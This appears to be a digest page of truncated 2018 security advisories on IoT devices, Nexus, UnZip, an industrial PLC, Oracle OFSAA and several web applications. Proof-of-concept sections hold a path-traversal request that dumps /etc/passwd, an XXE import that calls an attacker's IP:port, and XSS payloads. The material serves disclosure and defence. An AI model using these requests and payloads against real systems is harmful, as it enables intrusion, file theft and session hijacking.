We have published an accompanying blog post to this technical advisory with further information: https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html SEC Consult Vulnerability Lab Security Advisory < 20180221-0 > === title: Hijacking of arbitrary video baby monitors product: miSafes Mi-Cam remote video monitor vulnerable version: Android application v1.2.0, iOS v1.0.5 Firmware v1.0.38 fixed version: - CVE number: - impact: critical homepage: http://www.misafes.com/mi-cam found: 2017-11-30 by: Mathias Frank (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy set up & use, two-way talk and supports free local video recording, all can be use by our user friendly Mi-Cam app." Source: http://www.misafes.com/mi-cam Business recommendation: SEC Consult recommends not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved! Although cloud-connected hardware may have an advantage regarding usability and convenience for users, if security is lacking those products pose a great risk for all customers. Furthermore, it seems there exist similar products from other vendors, e.g. "Qihoo 360 Smart Home Camera", that look exactly the same and may also be affected but SEC Consult could not verify this. The cloud component hosted by "qiwocloud2.com" may be used by other products as well. Additional information regarding other vendors are described in our blog post linked at the top of this advisory. Vulnerability overview/description: --- The usage of the Mi-Cam video baby monitor and its Android (or iOS) application, involves numerous requests to a cloud infrastructure available at ipcam.qiwocloud2.com with the aim of communicating with the video baby monitor or respective Android application. The Android application has at least 5-10 installations according to Google Play Store with potentially as many iOS users as well. SEC Consult has identified multiple critical security issues within this product. 1) Broken Session Management & Insecure Direct Object References The usage of the Android application "Mi-Cam" and the interaction with the video baby monitor involves several different API calls. A number of critical API calls can be accessed by an attacker with arbitrary session tokens because of broken session management. This allows an attacker to retrieve information about the supplied account and its connected video baby monitors. Information retrieved by this feature is sufficient to view and interact with all connected video baby monitors for the supplied UID. 2) Missing Password Change Verification Code Invalidation The password forget functionality sends a 6-digit validation key which is valid for 30 minutes to the supplied email address in order to set a new password. Multiple codes can be requested though while previously delivered codes do not get invalidated and anyone of them can be used as a valid key. This can easily be brute-forced to take over other accounts. 3) Available Serial Interface The PCB of the video baby monitor holds an unlabeled UART interface where an attacker is able to get hardware level access to the device and for instance extract the firmware for further analysis. SEC Consult identified further security issues such as outdated software (issue 6) or weak passwords (issue 4) by analyzing the firmware using IoT Inspector (https://www.iot-inspector.com). 4) Weak Default Credentials The "root" user available on the video baby monitor uses very weak default credentials with only 4 digits. 5) Enumeration of user accounts The password reset functionality leaks information about the existence of supplied user accounts which can aid in further (brute-force) attacks. 6) Outdated and Vulnerable Software Several software components which are affected by publicly known vulnerabilities were identified in the firmware of the video baby monitor. Proof of concept: - As the vendor could not be reached in order to get the issues fixed we will omit detailed proof of concept information in this advisory. 1) Broke
SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 > === title: Multiple Cross-Site Scripting Vulnerabilities product: Sonatype Nexus Repository Manager OSS/Pro vulnerable version: <=2.14.5, <=3.7.1 fixed version: 2.14.6, 3.8.0 CVE number: CVE-2018-5306, CVE-2018-5307 impact: Medium homepage: https://www.sonatype.com/ found: 2017-12-12 by: Werner Schober, Daniel Ostovary (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "At Sonatype we have a long history of partnership with the world of open source software development. From our humble beginning as core contributors to Apache Maven, to supporting the world’s largest repository of open source components (Central), to distributing the world's most popular repository manager (Nexus), we exist for one simple reason; to help accelerate software innovation." Source: https://www.sonatype.com/about-sonatype Business recommendation: The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities which could be used by an attacker to execute JavaScript code in the user's browser. The vendor provides a patch for both version 2 and 3 of the product which should be installed immediately. It is recommended to conduct a thorough security review by IT security professionals in order to identify potential other security issues. Vulnerability overview/description: --- 1) Reflected XSS vulnerability The parameters "repoId" and "format" of the "healthCheckFileDetail" function are vulnerable to reflected XSS. If the attacker can lure a user into clicking a crafted link he could execute arbitrary JavaScript code. In case the user has sufficient permissions, an attacker can create arbitrary (administrative) users or perform stored XSS attacks (see 2). 2) Stored XSS vulnerabilities The application is vulnerable to multiple stored XSS vulnerabilities, which are described in the following list. 2.1) The first one is located in the "File Upload" functionality of the "Staging Upload". Uploading a file with JavaScript code in its name allows to store JavaScript code, which gets triggered every time the file name is shown (e.g. in "Repositories"). 2.2) The second stored XSS vulnerability is more precisely being considered as stored DOM injection. This vulnerability affects the functionality of creating a new user. When doing so it is possible to inject JavaScript/HTML code in the username, which later gets rendered/executed every time the username is displayed. 2.3) The third stored XSS vulnerability is also a stored DOM injection. It affects the "IQ Server Connection"/"IQ Server Dashboard" functionality. The "IQ Server URL" field in the "IQ Server Connection" allows to inject JavaScript/HTML code into the menu bulletpoint "IQ Server Dashboard". The vendor provided the following CVE numbers: * CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3 * CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2 Proof of concept: - 1) Reflected XSS vulnerability By luring an attacker into clicking the following link, an arbitrary JavaScript payload will be executed: https://example.com/nexus/service/siesta/healthcheck/healthCheckFile Detail/.../index.html?repoId=public=sectest Vulnerable parameters: -) repoId -) format 2) Stored XSS vulnerabilities ***Please note that only users with access to the respective functionalities are susceptive to the following stored XSS vulnerabilities.*** 2.1) The staging upload allows an attacker to upload a file, which contains a JavaScript payload in the filename. An example for a filename containing a "malicious" payload is as follows: ".jpg" This file can be uploaded flawlessly and everytime the filename is displayed, the JavaScript payload gets executed. 2.2) An attacker is able to create a new user, which contains a malicious JavaScript payload in the username. As an example the following username can be used: "EvilAdmin Create Repository -> Access repository via "Repositories" -> JavaScript code is being executed) 2.3) The nexus server allows to setup an IQ server connection. The server name is not validated and therefore allows the permanent injection of JavaScript code. To demonstrate the vulnerability
SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip
SEC Consult Vulnerability Lab Security Advisory < 20180207-0 > === title: Multiple buffer overflow vulnerabilities product: InfoZip UnZip vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22 fixed version: 6.10c23 CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133 CVE-2018-134,CVE-2018-135 impact: high homepage: http://www.info-zip.org/UnZip.html found: 2017-11-03 by: R. Freingruber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "UnZip is an extraction utility for archives compressed in .zip format (also called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our primary objectives have been portability and non-MSDOS functionality. UnZip will list, test, or extract files from a .zip archive, commonly found on MS-DOS systems. The default behavior (with no options) is to extract into the current directory (and subdirectories below it) all files from the specified zipfile." Source: http://www.info-zip.org/UnZip.html InfoZip's UnZip is used as default utility for uncompressing ZIP archives on nearly all *nix systems. It gets shipped with many commerical products on Windows to provide (un)compressing functionality as well. Business recommendation: InfoZip Unzip should be updated to the latest available version. Vulnerability overview/description: --- 1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135) InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing password protected ZIP archives. An attacker can exploit this vulnerability to overwrite heap chunks to get arbitrary code execution on the target system. For newer builds the risk for this vulnerability is partially mitigated because modern compilers automatically replace unsafe functions with length checking variants of the same function (for example sprintf gets replaced by sprintf_chk). This is done by the compiler at locations were the length of the destination buffer can be calculated. Nevertheless, it must be mentioned that UnZip is used on many systems including older systems or on exotic architectures on which this protection is not in place. Moreover, pre-compiled binaries which can be found on the internet lack the protection because the last major release of InfoZip's UnZip was in 2009 and compilers didn't enable this protection per default at that time. The required compiler flags are also not set in the Makefile of UnZip. Compiled applications are therefore only protected if the used compiler has this protection enabled per default which is only the case with modern compilers. To trigger this vulnerability (and the following) it's enough to uncompress a manipulated ZIP archive. Any of the following invocations can be used to trigger and abuse the vulnerabilities: >unzip malicious.zip >unzip -p malicious.zip >unzip -t malicious.zip 2) Heap-based out-of-bounds write (CVE-2018-131) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap-based out-of-bounds write if the archive filename does not contain a .zip suffix. 3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap/BSS-based buffer-overflow which can be used to write null-bytes out-of-bound when converting attacker-controlled strings to the local charset. 4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap out-of-bounds access vulnerability. 5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA implementation. Various crash dumps have been supplied to the vendor but no further analysis has been performed. Proof of concept: - 1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135) Unzipping a malicious archive results in the following output: (On Ubuntu 16.04 with UnZip 6.0 which was installed via aptitude install unzip)
SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range
We have published an accompanying blog post to this technical advisory with further information: https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html SEC Consult Vulnerability Lab Security Advisory < 20180201-0 > === title: Multiple critical vulnerabilities product: Whole Vibratissimo Smart Sex Toy product range vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware) fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware) CVE number: - impact: critical homepage: http://www.vibratissimo.com found: 2017-10-01 by: W. Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Control with Vibratissimo your AMOR Toy on your smartphone and get even more features by the app. With Vibratissimo you are open to new and exciting opportunities, whether you are in the same room or on different continents." Source: http://www.vibratissimo.com/en/index.html Business recommendation: SEC Consult highly recommends to update the app to the newest version available in the appstore. Furthermore the password, which was used within the app, should be changed immediately. If the password was used for multiple services, all passwords should be changed. To get rid of issue number 3 (Unauthenticated Bluetooth LE Connections) a firmware update can be applied. To apply the firmware update the devices have to be sent to Amor Gummiwaren GmbH. Vulnerability overview/description: --- 1) Customer Database Credential Disclosure The credentials for the whole Vibratissimo database environment were exposed on the internet. Due to the fact, that the PHPMyAdmin interface was exposed as well, an attacker could have been able to connect to the database and dump the whole data set. The dataset contains for example the following data: - Usernames - Session Tokens - Cleartext passwords - chat histories - explicit image galleries, which are created by the users themselves 2) Exposed administrative interfaces on the internet An administrative interface for databases was available without any filtering to the whole internet. In combination with other vulnerabilities an attacker could have been able to get access to the whole database data and even take over the server. 3) Cleartext Storage of Passwords The user passwords were stored unhashed in cleartext in the database. If an attacker gained access to the database (e.g. via credential disclosure), he could have been able to retrieve the plaintext passwords of users and abuse their privileges in the system. 4) Unauthenticated Bluetooth LE Connections The sex toys are connected without prior authentication to the app, which is the standard use case. For example one of the identified Bluetooth services allows to read the current device temperature. Other services, which can be accessed without prior authentication are: -) Setting the "intensity" of the current vibration pattern -) Reading various values (Temperature, etc) 5) Insufficient Authentication Mechanism The android application is using a type of authentication, which is against known best practice. The username and password are sent with every request to the server to authenticate and authorise the request. There is no session management implemented. However, the authentication credentials are transmitted via an encrypted SSL/TLS connection. 6) Insecure Direct Object Reference Due to flaws in the authorization schema, an authorization bypass vulnerability allows an attacker to get access to restricted functions and resources. In this case a user is able to set a profile picture by uploading a provided image. The image is stored on the Vibratissimo server and renamed. All images are renamed by incrementing a global number and assigning this number as the name of the image (e.g 200.png). An attacker is now able to iterate through those images and dump personal user images containing partially explicit content. The image can even be accessed if the profile has been set to "hidden" by the user. 7) Missing Authentication in Remote Control The mobile apps allow their users to use a feature called quick control. This feature allows to send a link with a unique ID to an email address or a telephone via SMS to get direct control of the sex toy over the internet. This wouldn't be a problem in gener
SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 > === title: Multiple Vulnerabilities product: Sprecher Automation SPRECON-E-C, PU-2433 vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for details) fixed version: 8.49 (most vulnerabilities, see "Solution" for details) CVE number: - impact: Medium homepage: https://www.sprecher-automation.com found: 2017-08-15 by: T. Weber, C.A. (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Sprecher Automation GmbH offers switchgears and automation solutions for energy, industry and infrastructure processes. Our customers are power utilities, industries, transportation companies, municipal utilities and public institutions. Company-own developments and cooperations with technology partners lead to a unique product portfolio consisting of traditional electrical technologies as well as high-tech electronics." Source: https://www.sprecher-automation.com/en/ Business recommendation: SEC Consult recommends to immediately patch the systems and follow the hardening guide provided by the vendor (SEC Consult did not have access to the hardening guide in order to review it). A thorough security review should be performed by security professionals as further security issues might exist within the product. Vulnerability overview/description: --- 1) Authenticated Path Traversal Vulnerability The web interface of the Sprecher PLC suffers from a path traversal vulnerability. A user which is authenticated on the web interface, which is intended as read-only interface, can download files with the permissions of the webserver (www-data). Files like "/etc/shadow" are not readable for the webserver. 2) Client-Side Password Hashing The password hashes which are stored on the system can be directly used to authenticate on the web interface (pass-the-hash) since the password is hashed in the browser of the user during login. 3) Missing Authentication The PLC exposes a Telnet management service on TCP port 2048. This interface can be used to control the PLC and does not require any authentication. 4) Permanent Denial of Service via Portscan An aggressive TCP SYN scan on a large amount of ports triggers a denial of service of the PLC service. This results in an persistent DoS of the standby PLC in an active - standby pair. Manual operator intervention is required to restore service availability. 5) Outdated Linux Kernel An ancient Linux kernel version with a high number of known security weaknesses is used for the PLC base operating system. Proof of concept: - 1) Authenticated Path Traversal Vulnerability Reading "passwd" is possible by triggering the following request: --- GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1 Host: Cookie: sid= Connection: close Upgrade-Insecure-Requests: 1 --- The file is directly fetched from the system: --- root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh operator:x:37:37:Operator:/var:/bin/sh haldaemon:x:68:68:hald:/:/bin/sh dbus:x:81:81:dbus:/var/run/dbus:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh sshd:x:103:99:Operator:/var:/bin/sh [...] --- 2) Client-Side Password Hashing The passwords are hashed in JavaScript before they are transmitted to the device. Therefore the hash is as good as the password. The following request shows a login process: --- POST /webserver/cgi-bin/spre.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json Accept-Language: de Content-Type: application/x-www-form-urlencoded If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT Referer: http:///We
SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 > === title: XXE & Reflected XSS product: Oracle Financial Services Analytical Applications vulnerable version: 7.3.5.x, 8.0.x fixed version: Oracle CPU January 2018 CVE number: CVE-2018-2660, CVE-2018-2661 impact: High homepage: http://www.oracle.com/us/products/applications/ financial-services/analytical-applications/index.html found: 2017-06-15 by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need." Source: http://www.oracle.com/us/products/applications/ financial-services/analytical-applications/index.html Business recommendation: By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using the OFSAA web application and thus obtain sensitive information from the system. It is also possible to bypass input validation checks in order to inject JavaScript code. SEC Consult recommends to immediately install the patched version. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues. Vulnerability overview/description: --- 1) XML eXternal Entity (XXE) Injection (CVE-2018-2660) The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application. 2) Reflected Cross Site Scripting (CVE-2018-2661) This vulnerability allows an unauthenticated user to inject malicious client side script which will be executed in the browser of a user if he visits the manipulated URL. Proof of concept: - 1) XML External Entity Injection (XXE) (CVE-2018-2660) For example, by importing the following XML code in the "Business Model Upload" function a connection request from the server to the attacker's system will be made. http://[IP:port]/; >]> IP:port = IP address and port where the attacker is listening for connections Furthermore some files can be exfiltrated to remote servers via the techniques described in: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf 2) Reflected Cross Site Scripting (CVE-2018-2661) The following parameters have been found to be vulnerable to reflected cross site scripting attacks. Furthermore, there are many more vulnerable parameters. The following payload shows a simple alert message box: URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle= METHOD : GET PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp? url=fetchErrorMessages.action=OCBCOFSAASG=summarypage={62}~ METHOD : GET PAYLOAD : errorMessage={62}~%27;alert%0a(0);//=DeleteConfirm Vulnerable / tested versions: - The following version has been tested which was the most recent one when the vulnerabilities were discovered: * Oracle Financial Services Analytical Applications 8.0.4.0.0 According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU January 2018. Vendor contact timeline: 2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com) 2017-09-20: Vendor requested to postpone the release date 2018-01-13: Vendor informed that Critical Patch Update that includes fixes of reported issues will be released on 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues 2018-01-23: Public disclosure of advisory Solution: - Apply patch update in the January 2018 Critical Patch Update: http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin
CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities
[Mon, 25 Apr 2016 12:32:33 GMT] Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27] X-Powered-By[PHP/5.4.27] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Keep-Alive[timeout=5, max=100] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html] Reference(s): http://cwp.localhost:2030/ http://cwp.localhost:2030/index.php http://cwp.localhost:2030/index.php?module=list_domains Security Risk: == The security risk of the remote sql-injection web vulnerability in the centos web panel application is estimated as high. (CVSS 7.5) Credits & Authors: ====== Vulnerability-Lab [ad...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com- ad...@evolution-sec.com Section:magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or resea...@vulnerability-lab.com) to get a ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Acadmic Microsoft - API Query Filter Cross Site Scripting Vulnerability
: academic.microsoft.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Referer: https://academic.microsoft.com/ Cookie: utag_main=v_id:015b543cdafd00b14436aadab8900104400390090086e$_sn:1$_ss:0$_st:1491768750447$ses_id:1491766926079%3B exp-session$_pn:2%3Bexp-session; s_norv=1491766950419-New; s_vnum=1493611200871%26vn%3D1; s_invisit=true; s_dslv=1491766950423; s_dslv_s=First%20Visit; s_ppn=mpdacad%3Aen-us%3Aregister; s_ppvl=mpdacad%253Aen-us%253Alogin%2C100%2C89%2C643%2C1355%2C621%2C1366%2C768%2C1%2CP; s_ppv=mpdacad%253Aen-us%253Aregister%2C100%2C92%2C675%2C1355%2C621%2C1366%2C768%2C1%2CP; s_fid=2DCC642E0324D787-3D30FA055450DC93; s_cc=true; s_sq=msstompdacad%3D%2526c.%2526a.%2526activitymap.%2526page%253Dmpdacad%25253Aen- us%25253Aregister%2526link%253DSign%252520up%252520with%252520Microsoft%252520account%2526region%253Dmain%2526pageIDType%253D1%2526. activitymap%2526.a%2526.c%2526pid%253Dmpdacad%25253Aen-us%25253Aregister%2526pidt%253D1%2526oid%253DSign%252520up%252520with%252520 Microsoft%252520account%2526oidt%253D3%2526ot%253DSUBMIT; AMCV_EA76ADE95776D2EC7F000101%40AdobeOrg= -179204249%7CMCMID%7C28933220378893493633963593270039587370; MSFPC=ID=d9c52c60bfa3454780dd8fed1ee6d500=1=201704=1; msacademic=da629bfe-3e6a-4e63-8c85-d684ae83d1d6 Connection: close - Response: HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Sun, 09 Apr 2017 12:55:23 GMT Connection: close Content-Length: 230 Reference(s): https://academic.microsoft.com/ https://academic.microsoft.com/api/ https://academic.microsoft.com/api/search/ https://academic.microsoft.com/api/search/GetFilters Solution - Fix & Patch: === 2018-**-**: Security Acknowledgements (Microsoft Security Response Center Team) - Unresponsive Security Risk: == The security risk of the non-persistent cross site scripting web vulnerability is estimated as medium. (CVSS 3.2) Credits & Authors: == Vulnerability Laboratory [Research Team] - Lawrence Amer (http://lawrenceamer.me) Profile: https://www.vulnerability-lab.com/show.php?user=Lawrence Amer Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities
se of the customer (kunden) and orders (bestellungen) context listings. Parse or escape the context and disallow special chars during the registration or add to prevent further script code injection attacks. The vulnerability can be resolved by an update to version 5.3.4 that is delivered by the manufacturer. The issue risk is marked as moderate. Security Risk: == The security risk of the stored cross site scripting vulnerabilities in the shopware cms are estimated as medium. (CVSS 4.4) Credits & Authors: == Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
scape the output content of the error exception for invalid inputs to prevent the execution point of the client-side vulnerability. Security Risk: == The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as medium (CVSS 3.3). Credits & Authors: == Benjamn Kunz Mejri (Vulnerability Laboratory) - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- 